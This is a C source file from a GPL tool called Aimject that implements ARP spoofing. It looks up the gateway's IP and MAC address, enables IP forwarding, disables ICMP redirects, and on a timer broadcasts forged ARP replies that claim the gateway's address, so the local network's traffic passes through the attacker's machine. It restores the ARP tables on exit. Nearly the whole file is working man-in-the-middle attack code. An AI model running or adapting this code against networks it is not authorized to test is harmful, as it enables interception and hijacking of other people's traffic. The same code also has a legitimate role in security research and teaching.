/*
 * Aimject
 *
 * Copyright (C) 2006 Jon Oberheide <jon@oberheide.org>
 *
 * This program is free software; you can redistribute it and/or
 * modify it under the terms of the GNU General Public License as
 * published by the Free Software Foundation; either version 2 of the
 * License, or (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful, but
 * WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
 * 02111-1307, USA.
 */

#include <config.h>
#include <stdio.h>
#include <stdlib.h>
#include <glib.h>
#include <dnet.h>
#include <gtk/gtk.h>
#include <glade/glade.h>

#include "os.h"
#include "arpspoof.h"
#include "main.h"

extern aimject_t *aj;

void
arp_send(gint type, struct addr *s_ha, struct addr *s_pa,
	 struct addr *t_ha, struct addr *t_pa)
{
	gchar arp_buf[ETH_HDR_LEN + ARP_HDR_LEN + ARP_ETHIP_LEN];
	gchar *s_ha_str, *s_pa_str, *t_ha_str, *t_pa_str;

	s_ha_str = g_strdup(eth_ntoa(&s_ha->addr_eth));
	s_pa_str = g_strdup(ip_ntoa(&s_pa->addr_ip));
	t_ha_str = g_strdup(eth_ntoa(&t_ha->addr_eth));
	t_pa_str = g_strdup(ip_ntoa(&t_pa->addr_ip));

	if (type == ARP_OP_REQUEST) {
		g_debug("arp request from %s to %s: who has %s tell %s",
			s_ha_str, t_ha_str, t_pa_str, s_pa_str);
	} else if (type == ARP_OP_REPLY) {
		g_debug("arp reply from %s to %s: %s is at %s",
			s_ha_str, t_ha_str, s_pa_str, s_ha_str);
	} else {
		g_debug("arp unknown from %s to %s", s_ha_str, t_ha_str);
	}

	eth_pack_hdr(arp_buf, ETH_ADDR_BROADCAST, s_ha->addr_eth, ETH_TYPE_ARP);
	arp_pack_hdr_ethip(arp_buf + ETH_HDR_LEN, type,
			   s_ha->addr_eth, s_pa->addr_ip,
			   t_ha->addr_eth, t_pa->addr_ip);
	eth_send(aj->eth, arp_buf, sizeof(arp_buf));

	g_free(s_ha_str);
	g_free(s_pa_str);
	g_free(t_ha_str);
	g_free(t_pa_str);
}

void
udp_send(struct addr *dst_ip)
{
	int sock;
	struct sockaddr_in dst;
	dst.sin_family = AF_INET;
	dst.sin_addr.s_addr = dst_ip->addr_ip;
	dst.sin_port = rand_uint16(aj->rand);

	/* hack to force OS to arp */
	sock = socket(AF_INET, SOCK_DGRAM, 0);
	g_return_if_fail(sock != -1);
	sendto(sock, "\xff", 1, 0, (struct sockaddr *) &dst, sizeof(dst));
	close(sock);
}

gboolean
arp_timer(gpointer data)
{
	/* send spoofed arp */
	arp_send(ARP_OP_REPLY, &aj->intf_ha, &aj->gw_pa,
		 &aj->broad_ha, &aj->any_pa);
	return TRUE;
}

gpointer
arpspoof_init(gpointer data)
{
	arp_t *a;
	route_t *r;
	gint i, ret;
	GSource *timer;
	GMainContext *context;
	struct route_entry route_e;
	struct arp_entry arp_e;

	g_debug("arp spoofing thread spawned");

	context = g_main_context_new();
	aj->arp_loop = g_main_loop_new(context, FALSE);

	ret = addr_aton("72.14.207.99", &route_e.route_dst);
	g_assert(ret == 0);
	ret = addr_aton("0.0.0.0", &aj->any_pa);
	g_assert(ret == 0);
	ret = addr_aton("ff:ff:ff:ff:ff:ff", &aj->broad_ha);
	g_assert(ret == 0);

	/* fetch ip address of gateway */
	r = route_open();
	g_assert(r != NULL);
	ret = route_get(r, &route_e);
	g_assert(ret == 0);
	route_close(r);
	memcpy(&aj->gw_pa, &route_e.route_gw, sizeof(struct addr)); 

	/* fetch mac address of gateway */
	a = arp_open();
	g_assert(a != NULL);
	memcpy(&arp_e.arp_pa, &aj->gw_pa, sizeof(struct addr));
	while (arp_get(a, &arp_e) != 0) {
		/* arp for gateway mac */
		arp_send(ARP_OP_REQUEST, &aj->intf_ha, &aj->intf_pa,
			 &aj->broad_ha, &aj->gw_pa);
		udp_send(&aj->gw_pa);
		g_usleep(1 * G_USEC_PER_SEC);
	}
	arp_close(a);

	memcpy(&aj->gw_ha, &arp_e.arp_ha, sizeof(struct addr));
	g_debug("gateway ip: %s", addr_ntoa(&aj->gw_pa));
	g_debug("gateway mac: %s", addr_ntoa(&aj->gw_ha));

	/* enable ip forwarding */
	g_debug("enabling ip forwarding and disabling icmp redirects");
	ret = enable_ip_forwarding();
	if (!ret) {
		g_warning("ip forwarding/icmp redirects failed");
	}

	timer = g_timeout_source_new(ARPSPOOF_TIMER);
	g_source_set_callback(timer, (GSourceFunc) arp_timer, NULL, NULL);
	g_source_attach(timer, context);
	g_source_unref(timer);

	g_main_loop_run(aj->arp_loop);
 
	g_source_destroy(timer);
	g_main_loop_unref(aj->arp_loop);
	g_main_context_unref(context);
	aj->arp_loop = NULL;

	/* kill current arp entry */
	a = arp_open();
	g_assert(a != NULL);
	arp_delete(a, &arp_e);
	arp_close(a);

	/* restore previous arp state */
	g_debug("restoring arp state");
	for (i = 0; i < 3; ++i) {
		arp_send(ARP_OP_REPLY, &aj->gw_ha, &aj->gw_pa,
			 &aj->broad_ha, &aj->any_pa);
		g_usleep(1 * G_USEC_PER_SEC);
	}

	return NULL;
}
